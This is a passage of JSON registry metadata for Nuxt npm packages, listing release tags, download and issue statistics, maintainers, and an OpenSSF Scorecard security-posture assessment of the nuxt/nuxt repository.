:"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"9f370cb97c98ff40d4ed5c871147f3c441883b7f","kind":"commit","published_at":"2016-11-10T14:09:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"a8776de913a391bfd825b56cbd5ae655d3490240","kind":"commit","published_at":"2016-11-10T13:46:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"c97c4ec32e0b5a889bd3b95f5f18d251db202354","kind":"commit","published_at":"2016-11-10T02:38:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"d88948bdeac9cd3b8c8f1c1456198e666e49664e","kind":"commit","published_at":"2016-11-10T01:19:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.0/manifests"},{"name":"v0.2.6","sha":"18a2b57655a6be21a93949520a663825471fbd48","kind":"commit","published_at":"2016-11-09T22:59:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"a5780a09cae0a0109103bf660da96e479ec5ef73","kind":"commit","published_at":"2016-11-09T14:55:02.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"73bdfc03943799025def2b91f2402208126da453","kind":"commit","published_at":"2016-11-09T01:35:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"90a97d76ce938be645f82f538a268a83b4c9630d","kind":"commit","published_at":"2016-11-08T02:48:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"923b211a929392e7bb77e3e9326655229397ca13","kind":"commit","published_at":"2016-11-08T00:54:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"876054ed48764ef11278c27d1884d94c3153b05d","kind":"commit","published_at":"2016-11-08T00:18:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"9ebbb14eabd73ed64871d0ee59fafaad914e95f2","kind":"commit","published_at":"2016-11-07T22:26:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.0/manifests"}]},"repo_metadata_updated_at":"2026-02-13T18:02:57.048Z","dependent_packages_count":8,"downloads":13798,"downloads_period":"last-month","dependent_repos_count":425,"rankings":{"downloads":1.0494419604372365,"dependent_repos_count":0.8457727025732374,"dependent_packages_count":2.421390119783199,"stargazers_count":0.16519994711762306,"forks_count":0.5466428312764772,"docker_downloads_count":1.6186636805636194,"average":1.107851873625232},"purl":"pkg:npm/%40nuxt/cli-edge","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/@nuxt/cli-edge","docker_dependents_count":1,"docker_downloads_count":8,"usage_url":"https://repos.ecosyste.ms/usage/npm/@nuxt/cli-edge","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/@nuxt/cli-edge/dependencies","status":null,"funding_links":["https://opencollective.com/nuxtjs","https://github.com/sponsors/nuxt"],"critical":null,"issue_metadata":{"last_synced_at":"2026-02-13T18:00:30.319Z","issues_count":6007,"pull_requests_count":6866,"avg_time_to_close_issue":11690528.2843204,"avg_time_to_close_pull_request":786776.4495867769,"issues_closed_count":4402,"pull_requests_closed_count":6050,"pull_request_authors_count":588,"issue_authors_count":3402,"avg_comments_per_issue":4.151489928416847,"avg_comments_per_pull_request":2.496213224584911,"merged_pull_requests_count":5386,"bot_issues_count":12,"bot_pull_requests_count":2972,"past_year_issues_count":940,"past_year_pull_requests_count":1678,"past_year_avg_time_to_close_issue":711939.6998050682,"past_year_avg_time_to_close_pull_request":221172.79485238457,"past_year_issues_closed_count":513,"past_year_pull_requests_closed_count":1321,"past_year_pull_request_authors_count":141,"past_year_issue_authors_count":674,"past_year_avg_comments_per_issue":2.2457446808510637,"past_year_avg_comments_per_pull_request":3.4153754469606676,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":694,"past_year_merged_pull_requests_count":1175,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/issues","maintainers":[{"login":"danielroe","count":1324,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":364,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"DamianGlowala","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"pi0","count":98,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pi0"},{"login":"Mini-ghost","count":91,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mini-ghost"},{"login":"manniL","count":76,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/manniL"},{"login":"BobbieGoede","count":70,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"antfu","count":63,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"userquin","count":50,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"cernymatej","count":44,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/cernymatej"},{"login":"TheAlexLichter","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheAlexLichter"},{"login":"OrbisK","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/OrbisK"},{"login":"wattanx","count":25,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"Atinux","count":24,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Atinux"},{"login":"ineshbose","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"atinux","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"productdevbook","count":16,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"dargmuesli","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"Hebilicious","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"},{"login":"warflash","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/warflash"},{"login":"lihbr","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lihbr"},{"login":"madebyfabian","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/madebyfabian"},{"login":"KazariEX","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/KazariEX"},{"login":"HugoRCD","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/HugoRCD"},{"login":"romhml","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/romhml"},{"login":"posva","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/posva"},{"login":"clarkdo","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/clarkdo"},{"login":"farnabaz","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/farnabaz"},{"login":"arashsheyda","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arashsheyda"},{"login":"Diizzayy","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Diizzayy"},{"login":"adhamfarrag","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/adhamfarrag"},{"login":"vargasmesh","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vargasmesh"},{"login":"benjamincanac","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/benjamincanac"},{"login":"kikudesuyo","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kikudesuyo"},{"login":"kazupon","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kazupon"},{"login":"msmakouz","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/msmakouz"}],"active_maintainers":[{"login":"danielroe","count":321,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":72,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"Mini-ghost","count":66,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mini-ghost"},{"login":"OrbisK","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/OrbisK"},{"login":"BobbieGoede","count":29,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"cernymatej","count":29,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/cernymatej"},{"login":"DamianGlowala","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"TheAlexLichter","count":21,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheAlexLichter"},{"login":"atinux","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"wattanx","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"userquin","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"antfu","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"KazariEX","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/KazariEX"},{"login":"HugoRCD","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/HugoRCD"},{"login":"productdevbook","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"romhml","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/romhml"},{"login":"dargmuesli","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"kikudesuyo","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kikudesuyo"},{"login":"ineshbose","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"Hebilicious","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fcli-edge/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fcli-edge/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fcli-edge/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fcli-edge/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fcli-edge/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fcli-edge/codemeta","maintainers":[{"uuid":"nuxt.bot","login":"nuxt.bot","name":null,"email":"pyapar+nuxtbot@gmail.com","url":null,"packages_count":22,"html_url":"https://www.npmjs.com/~nuxt.bot","role":null,"created_at":"2022-11-20T21:02:43.658Z","updated_at":"2022-11-20T21:02:43.658Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/nuxt.bot/packages"},{"uuid":"pi0","login":"pi0","name":null,"email":"pyapar@gmail.com","url":null,"packages_count":689,"html_url":"https://www.npmjs.com/~pi0","role":null,"created_at":"2022-11-20T21:02:43.580Z","updated_at":"2022-11-20T21:02:43.580Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/pi0/packages"},{"uuid":"antfu","login":"antfu","name":null,"email":"anthonyfu117@hotmail.com","url":null,"packages_count":733,"html_url":"https://www.npmjs.com/~antfu","role":null,"created_at":"2022-11-20T21:02:43.494Z","updated_at":"2022-11-20T21:02:43.494Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/antfu/packages"},{"uuid":"atinux","login":"atinux","name":null,"email":"atinux@gmail.com","url":null,"packages_count":378,"html_url":"https://www.npmjs.com/~atinux","role":null,"created_at":"2022-11-20T21:02:43.546Z","updated_at":"2022-11-20T21:02:43.546Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/atinux/packages"},{"uuid":"danielroe","login":"danielroe","name":null,"email":"daniel@roe.dev","url":null,"packages_count":434,"html_url":"https://www.npmjs.com/~danielroe","role":null,"created_at":"2022-11-20T21:02:43.638Z","updated_at":"2022-11-20T21:02:43.638Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/danielroe/packages"},{"uuid":"clarkdo","login":"clarkdo","name":null,"email":"clark.duxin@gmail.com","url":null,"packages_count":31,"html_url":"https://www.npmjs.com/~clarkdo","role":null,"created_at":"2022-11-20T21:02:43.605Z","updated_at":"2022-11-20T21:02:43.605Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/clarkdo/packages"},{"uuid":"nuxtbot","login":"nuxtbot","name":null,"email":"nuxtbot@roe.dev","url":null,"packages_count":148,"html_url":"https://www.npmjs.com/~nuxtbot","role":null,"created_at":"2023-08-21T00:49:13.672Z","updated_at":"2023-08-21T00:49:13.672Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/nuxtbot/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5608775,"maintainers_count":1189233,"namespaces_count":373614,"keywords_count":0,"github":"npm","metadata":{"funded_packages_count":166557},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-04-03T05:46:01.652Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":1096149,"name":"@nuxt/webpack-edge","ecosystem":"npm","description":null,"homepage":"https://github.com/nuxt/nuxt","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/nuxt/nuxt","keywords_array":[],"namespace":"nuxt","versions_count":1802,"first_release_published_at":"2018-10-24T17:01:20.206Z","latest_release_published_at":"2020-06-29T00:23:25.869Z","latest_release_number":"3.0.0-26556502.75dd90f2","last_synced_at":"2026-03-30T23:03:22.569Z","created_at":"2022-04-08T10:39:39.524Z","updated_at":"2026-03-30T23:03:22.570Z","registry_url":"https://www.npmjs.com/package/@nuxt/webpack-edge","install_command":"npm install @nuxt/webpack-edge","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"next":"3.0.0-26556502.75dd90f2","latest":"2.18.2-28661769.e265ef3"}},"repo_metadata":{"id":37288797,"uuid":"71995937","full_name":"nuxt/nuxt","owner":"nuxt","description":"The Full-Stack Vue Framework.","archived":false,"fork":false,"pushed_at":"2026-02-13T11:08:58.000Z","size":134344,"stargazers_count":59568,"open_issues_count":935,"forks_count":5524,"subscribers_count":784,"default_branch":"main","last_synced_at":"2026-02-13T11:29:52.149Z","etag":null,"topics":["csr","framework","full-stack","hacktoberfest","hybrid","node","nuxt","server-rendering","ssg","ssr","static-site-generator","universal","vue"],"latest_commit_sha":null,"homepage":"https://nuxt.com","language":"TypeScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/nuxt.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":"CODEOWNERS","security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"open_collective":"nuxtjs"}},"created_at":"2016-10-26T11:18:47.000Z","updated_at":"2026-02-13T11:06:01.000Z","dependencies_parsed_at":"2024-12-25T13:30:54.580Z","dependency_job_id":"22cffcce-6e0a-4001-b86c-b81e60fdf77b","html_url":"https://github.com/nuxt/nuxt","commit_stats":{"total_commits":7074,"total_committers":809,"mean_commits":8.744128553770086,"dds":0.6857506361323156,"last_synced_commit":"660f1720301b8d6487c89b6f86b4e7630573bca4"},"previous_names":["nuxt/nuxt.js","atinux/nuxt.js"],"tags_count":311,"template":false,"template_full_name":null,"purl":"pkg:github/nuxt/nuxt","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/sbom","scorecard":{"id":214668,"data":{"date":"2025-08-15T10:56:51Z","repo":{"name":"github.com/nuxt/nuxt","commit":"abf5d9e9f4a78a393a0ffbd8cfac8d24731217d6"},"scorecard":{"version":"v5.2.1","commit":"ab2f6e92482462fe66246d9e32f642855a691dc1"},"score":8.4,"checks":[{"name":"Dependency-Update-Tool","score":10,"reason":"update tool detected","details":["Info: detected update tool: RenovateBot: renovate.json:1"],"documentation":{"short":"Determines if the project uses a dependency update tool.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dependency-update-tool"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 16 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#maintained"}},{"name":"Code-Review","score":6,"reason":"Found 14/23 approved changesets -- score normalized to 6","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#code-review"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dangerous-workflow"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#security-policy"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#binary-artifacts"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Info: jobLevel 'contents' permission set to 'read': .github/workflows/cache-cleanup.yml:18","Warn: jobLevel 'actions' permission set to 'write': .github/workflows/cache-cleanup.yml:17","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/changelog.yml:22","Info: jobLevel 'contents' permission set to 'read': .github/workflows/ci.yml:76","Info: jobLevel 'actions' permission set to 'read': .github/workflows/ci.yml:75","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/release.yml:20","Info: jobLevel 'contents' permission set to 'read': .github/workflows/scorecards.yml:29","Info: jobLevel 'actions' permission set to 'read': .github/workflows/scorecards.yml:30","Info: jobLevel 'contents' permission set to 'read': .github/workflows/semantic-pull-requests.yml:15","Info: jobLevel 'pull-requests' permission set to 'read': .github/workflows/semantic-pull-requests.yml:16","Warn: jobLevel 'statuses' permission set to 'write': .github/workflows/semantic-pull-requests.yml:17","Info: topLevel 'contents' permission set to 'read': .github/workflows/autofix-docs.yml:11","Info: topLevel 'contents' permission set to 'read': .github/workflows/autofix.yml:9","Info: found token with 'none' permissions: .github/workflows/cache-cleanup.yml:1","Info: found token with 'none' permissions: .github/workflows/changelog.yml:1","Info: found token with 'none' permissions: .github/workflows/ci.yml:1","Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:15","Info: found token with 'none' permissions: .github/workflows/docs-check-links.yml:1","Info: found token with 'none' permissions: .github/workflows/docs-deploy.yml:1","Info: found token with 'none' permissions: .github/workflows/docs.yml:1","Info: found token with 'none' permissions: .github/workflows/label-pr.yml:1","Info: topLevel 'contents' permission set to 'read': .github/workflows/lint-monorepo.yml:22","Info: topLevel 'contents' permission set to 'read': .github/workflows/lint-workflows.yml:20","Info: found token with 'none' permissions: .github/workflows/notify-nuxt-bridge.yml:1","Info: found token with 'none' permissions: .github/workflows/notify-nuxt-website.yml:1","Info: found token with 'none' permissions: .github/workflows/release.yml:1","Info: topLevel permissions set to 'read-all': .github/workflows/scorecards.yml:18","Info: found token with 'none' permissions: .github/workflows/semantic-pull-requests.yml:1","Info: found token with 'none' permissions: .github/workflows/team-triage.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#token-permissions"}},{"name":"Pinned-Dependencies","score":10,"reason":"all dependencies are pinned","details":["Info:  59 out of  59 GitHub-owned GitHubAction dependencies pinned","Info:  28 out of  28 third-party GitHubAction dependencies pinned","Info:   1 out of   1 containerImage dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#cii-best-practices"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#signed-releases"}},{"name":"SAST","score":9,"reason":"SAST tool detected but not run on all commits","details":["Info: SAST configuration detected: CodeQL","Warn: 22 commits out of 24 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#sast"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#fuzzing"}},{"name":"Branch-Protection","score":5,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'allow deletion' disabled on branch '3.x'","Info: 'force pushes' disabled on branch 'main'","Info: 'force pushes' disabled on branch '3.x'","Warn: 'branch protection settings apply to administrators' is disabled on branch 'main'","Warn: 'branch protection settings apply to administrators' is disabled on branch '3.x'","Warn: 'stale review dismissal' is disabled on branch 'main'","Warn: 'stale review dismissal' is disabled on branch 